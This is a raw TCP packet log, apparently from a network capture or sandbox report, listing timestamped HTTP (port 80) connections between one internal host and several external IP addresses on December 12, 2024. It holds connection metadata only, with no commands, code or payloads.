                                                                                        Dec 12, 2024 21:56:23.113424063 CET804974952.223.13.41192.168.11.20
                                                                                        Dec 12, 2024 21:56:23.113607883 CET4974980192.168.11.2052.223.13.41
                                                                                        Dec 12, 2024 21:56:23.117257118 CET4974980192.168.11.2052.223.13.41
                                                                                        Dec 12, 2024 21:56:23.230911970 CET804974952.223.13.41192.168.11.20
                                                                                        Dec 12, 2024 21:56:23.248136044 CET804974952.223.13.41192.168.11.20
                                                                                        Dec 12, 2024 21:56:23.248152018 CET804974952.223.13.41192.168.11.20
                                                                                        Dec 12, 2024 21:56:23.248290062 CET4974980192.168.11.2052.223.13.41
                                                                                        Dec 12, 2024 21:56:23.254965067 CET804974952.223.13.41192.168.11.20
                                                                                        Dec 12, 2024 21:56:23.255055904 CET4974980192.168.11.2052.223.13.41
                                                                                        Dec 12, 2024 21:56:24.624294996 CET4974980192.168.11.2052.223.13.41
                                                                                        Dec 12, 2024 21:56:25.641360998 CET4975080192.168.11.2052.223.13.41
                                                                                        Dec 12, 2024 21:56:25.755358934 CET804975052.223.13.41192.168.11.20
                                                                                        Dec 12, 2024 21:56:25.755580902 CET4975080192.168.11.2052.223.13.41
                                                                                        Dec 12, 2024 21:56:25.759191036 CET4975080192.168.11.2052.223.13.41
                                                                                        Dec 12, 2024 21:56:25.759254932 CET4975080192.168.11.2052.223.13.41
                                                                                        Dec 12, 2024 21:56:25.873183012 CET804975052.223.13.41192.168.11.20
                                                                                        Dec 12, 2024 21:56:25.873228073 CET804975052.223.13.41192.168.11.20
                                                                                        Dec 12, 2024 21:56:25.873496056 CET804975052.223.13.41192.168.11.20
                                                                                        Dec 12, 2024 21:56:25.873539925 CET804975052.223.13.41192.168.11.20
                                                                                        Dec 12, 2024 21:56:25.873568058 CET804975052.223.13.41192.168.11.20
                                                                                        Dec 12, 2024 21:56:25.873778105 CET804975052.223.13.41192.168.11.20
                                                                                        Dec 12, 2024 21:56:25.873820066 CET804975052.223.13.41192.168.11.20
                                                                                        Dec 12, 2024 21:56:25.889538050 CET804975052.223.13.41192.168.11.20
                                                                                        Dec 12, 2024 21:56:25.890017986 CET804975052.223.13.41192.168.11.20
                                                                                        Dec 12, 2024 21:56:25.890129089 CET4975080192.168.11.2052.223.13.41
                                                                                        Dec 12, 2024 21:56:25.897916079 CET804975052.223.13.41192.168.11.20
                                                                                        Dec 12, 2024 21:56:25.898089886 CET4975080192.168.11.2052.223.13.41
                                                                                        Dec 12, 2024 21:56:27.264332056 CET4975080192.168.11.2052.223.13.41
                                                                                        Dec 12, 2024 21:56:28.281147957 CET4975180192.168.11.2052.223.13.41
                                                                                        Dec 12, 2024 21:56:28.394696951 CET804975152.223.13.41192.168.11.20
                                                                                        Dec 12, 2024 21:56:28.394871950 CET4975180192.168.11.2052.223.13.41
                                                                                        Dec 12, 2024 21:56:28.397562981 CET4975180192.168.11.2052.223.13.41
                                                                                        Dec 12, 2024 21:56:28.511214018 CET804975152.223.13.41192.168.11.20
                                                                                        Dec 12, 2024 21:56:28.529567003 CET804975152.223.13.41192.168.11.20
                                                                                        Dec 12, 2024 21:56:28.529777050 CET804975152.223.13.41192.168.11.20
                                                                                        Dec 12, 2024 21:56:28.529967070 CET4975180192.168.11.2052.223.13.41
                                                                                        Dec 12, 2024 21:56:28.531147957 CET4975180192.168.11.2052.223.13.41
                                                                                        Dec 12, 2024 21:56:28.536596060 CET804975152.223.13.41192.168.11.20
                                                                                        Dec 12, 2024 21:56:28.536727905 CET4975180192.168.11.2052.223.13.41
                                                                                        Dec 12, 2024 21:56:28.644840002 CET804975152.223.13.41192.168.11.20
                                                                                        Dec 12, 2024 21:56:33.885160923 CET4975280192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:34.056019068 CET8049752198.2.236.225192.168.11.20
                                                                                        Dec 12, 2024 21:56:34.056257010 CET4975280192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:34.063170910 CET4975280192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:34.234461069 CET8049752198.2.236.225192.168.11.20
                                                                                        Dec 12, 2024 21:56:34.234687090 CET4975280192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:35.575220108 CET4975280192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:36.591831923 CET4975380192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:36.760282040 CET8049753198.2.236.225192.168.11.20
                                                                                        Dec 12, 2024 21:56:36.760432005 CET4975380192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:36.767438889 CET4975380192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:36.936269999 CET8049753198.2.236.225192.168.11.20
                                                                                        Dec 12, 2024 21:56:36.936501980 CET4975380192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:38.277079105 CET4975380192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:39.293394089 CET4975480192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:39.461750031 CET8049754198.2.236.225192.168.11.20
                                                                                        Dec 12, 2024 21:56:39.461996078 CET4975480192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:39.468727112 CET4975480192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:39.468775034 CET4975480192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:39.468826056 CET4975480192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:39.637511015 CET8049754198.2.236.225192.168.11.20
                                                                                        Dec 12, 2024 21:56:39.637723923 CET8049754198.2.236.225192.168.11.20
                                                                                        Dec 12, 2024 21:56:39.637734890 CET8049754198.2.236.225192.168.11.20
                                                                                        Dec 12, 2024 21:56:39.637938976 CET4975480192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:40.979623079 CET4975480192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:41.995816946 CET4975580192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:42.164911032 CET8049755198.2.236.225192.168.11.20
                                                                                        Dec 12, 2024 21:56:42.165132999 CET4975580192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:42.167582035 CET4975580192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:42.337433100 CET8049755198.2.236.225192.168.11.20
                                                                                        Dec 12, 2024 21:56:42.337686062 CET4975580192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:42.339065075 CET4975580192.168.11.20198.2.236.225
                                                                                        Dec 12, 2024 21:56:42.507942915 CET8049755198.2.236.225192.168.11.20
                                                                                        Dec 12, 2024 21:56:47.512989044 CET4975680192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:47.673079967 CET8049756142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:47.673250914 CET4975680192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:47.676862955 CET4975680192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:47.837017059 CET8049756142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:47.850152016 CET8049756142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:47.850291014 CET4975680192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:49.180994034 CET4975680192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:49.341013908 CET8049756142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:50.198627949 CET4975780192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:50.358778000 CET8049757142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:50.358978033 CET4975780192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:50.366075993 CET4975780192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:50.526098967 CET8049757142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:50.527791977 CET8049757142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:50.528119087 CET4975780192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:51.868035078 CET4975780192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:52.028248072 CET8049757142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:52.885327101 CET4975880192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:53.045541048 CET8049758142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:53.045705080 CET4975880192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:53.049279928 CET4975880192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:53.049329042 CET4975880192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:53.049376965 CET4975880192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:53.209358931 CET8049758142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:53.209599972 CET8049758142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:53.209608078 CET8049758142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:53.212441921 CET8049758142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:55.571100950 CET4975980192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:55.736252069 CET8049759142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:55.736422062 CET4975980192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:55.738823891 CET4975980192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:55.899077892 CET8049759142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:55.901047945 CET8049759142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:56:55.901251078 CET4975980192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:55.901834011 CET4975980192.168.11.20142.171.82.112
                                                                                        Dec 12, 2024 21:56:56.061825991 CET8049759142.171.82.112192.168.11.20
                                                                                        Dec 12, 2024 21:57:01.083400011 CET4976080192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:01.197069883 CET804976015.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:01.197276115 CET4976080192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:01.200845957 CET4976080192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:01.314686060 CET804976015.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:02.709944963 CET4976080192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:02.867363930 CET804976015.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:03.726903915 CET4976180192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:03.840946913 CET804976115.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:03.841141939 CET4976180192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:03.845204115 CET4976180192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:03.966073036 CET804976115.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:04.883649111 CET804976115.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:04.883696079 CET804976115.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:04.883832932 CET4976180192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:04.890031099 CET804976115.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:04.890157938 CET4976180192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:05.349462032 CET4976180192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:06.365725040 CET4976280192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:06.479753971 CET804976215.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:06.479914904 CET4976280192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:06.486993074 CET4976280192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:06.487047911 CET4976280192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:06.600920916 CET804976215.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:06.600960970 CET804976215.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:06.601474047 CET804976215.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:06.601516008 CET804976215.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:06.601545095 CET804976215.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:06.601572990 CET804976215.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:06.601604939 CET804976215.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:06.617058992 CET804976215.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:06.617513895 CET804976215.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:06.617748022 CET4976280192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:06.624867916 CET804976215.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:06.624980927 CET4976280192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:07.989510059 CET4976280192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:09.006844044 CET4976380192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:09.120673895 CET804976315.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:09.120852947 CET4976380192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:09.125288963 CET4976380192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:09.239173889 CET804976315.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:12.182336092 CET804976315.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:12.182348013 CET804976315.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:12.182666063 CET4976380192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:12.183263063 CET4976380192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:12.185971975 CET804976315.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:12.186060905 CET4976380192.168.11.2015.197.148.33
                                                                                        Dec 12, 2024 21:57:12.296704054 CET804976315.197.148.33192.168.11.20
                                                                                        Dec 12, 2024 21:57:17.337407112 CET4976480192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:17.469464064 CET804976476.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:17.469615936 CET4976480192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:17.476542950 CET4976480192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:17.607647896 CET804976476.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:17.607656956 CET804976476.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:17.607798100 CET4976480192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:18.987782001 CET4976480192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:20.004566908 CET4976580192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:20.136063099 CET804976576.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:20.136295080 CET4976580192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:20.139900923 CET4976580192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:20.271025896 CET804976576.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:20.271035910 CET804976576.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:20.271199942 CET4976580192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:21.642853975 CET4976580192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:22.661216974 CET4976680192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:22.794204950 CET804976676.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:22.794404030 CET4976680192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:22.800879955 CET4976680192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:22.800899982 CET4976680192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:22.800976038 CET4976680192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:22.801145077 CET4976680192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:22.938843966 CET804976676.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:22.938852072 CET804976676.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:22.938855886 CET804976676.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:22.938860893 CET804976676.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:22.939039946 CET4976680192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:24.314713955 CET4976680192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:25.330296993 CET4976780192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:25.462147951 CET804976776.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:25.462316036 CET4976780192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:25.464919090 CET4976780192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:25.638417006 CET804976776.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:33.628042936 CET804976776.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:33.628089905 CET804976776.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:33.628379107 CET4976780192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:33.629045963 CET4976780192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:57:33.762020111 CET804976776.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:57:38.786911964 CET4976880192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:38.900945902 CET8049768104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:38.901148081 CET4976880192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:38.907548904 CET4976880192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:39.021461964 CET8049768104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:40.420150995 CET4976880192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:40.534970045 CET8049768104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:40.535206079 CET4976880192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:41.437441111 CET4976980192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:41.551317930 CET8049769104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:41.551465988 CET4976980192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:41.557610035 CET4976980192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:41.671376944 CET8049769104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:43.060120106 CET4976980192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:43.175411940 CET8049769104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:43.175609112 CET4976980192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:44.076348066 CET4977080192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:44.190629005 CET8049770104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:44.190869093 CET4977080192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:44.197402000 CET4977080192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:44.197429895 CET4977080192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:44.311800957 CET8049770104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:44.311815977 CET8049770104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:44.312082052 CET8049770104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:44.312097073 CET8049770104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:45.700257063 CET4977080192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:45.816431046 CET8049770104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:45.816591024 CET4977080192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:46.716660023 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:46.830585957 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:46.830777884 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:46.833236933 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:46.947185040 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.567513943 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.567579031 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.567845106 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.567867041 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.567935944 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.567980051 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.568053007 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.568084002 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.568094969 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.568126917 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.568169117 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.568254948 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.568360090 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.568422079 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.568432093 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.568526983 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.568631887 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.568679094 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.568726063 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.568732023 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.568783045 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.568825960 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.568870068 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.568906069 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.568974972 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.569267035 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.569700956 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.569760084 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.569803953 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.569847107 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.569890022 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.569941044 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.569950104 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.570009947 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.570240021 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.570667982 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.570729017 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.570771933 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.570815086 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.570857048 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.570883036 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.570931911 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.570955038 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.571336985 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.571634054 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.571691990 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.571767092 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.571811914 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.571854115 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.571897030 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.571928024 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.571997881 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.572210073 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.572912931 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.572971106 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.573014021 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.573057890 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.573101044 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.573240042 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.573302031 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.573740005 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.573827982 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.573883057 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.573926926 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.574034929 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.574155092 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.574155092 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.574527025 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.574584961 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.574630976 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.574800968 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.575537920 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.575597048 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.575643063 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.575685024 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.575721979 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.575762033 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.575794935 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.575885057 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.576082945 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.576647997 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.576697111 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.576858044 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.576914072 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.577019930 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.577091932 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.577166080 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.577178001 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.577236891 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.577291012 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.577338934 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.577430964 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.578197956 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.578311920 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.578360081 CET8049771104.21.83.167192.168.11.20
                                                                                        Dec 12, 2024 21:57:48.578383923 CET4977180192.168.11.20104.21.83.167
                                                                                        Dec 12, 2024 21:57:48.578435898 CET8049771104.21.83.167192.168.11.20
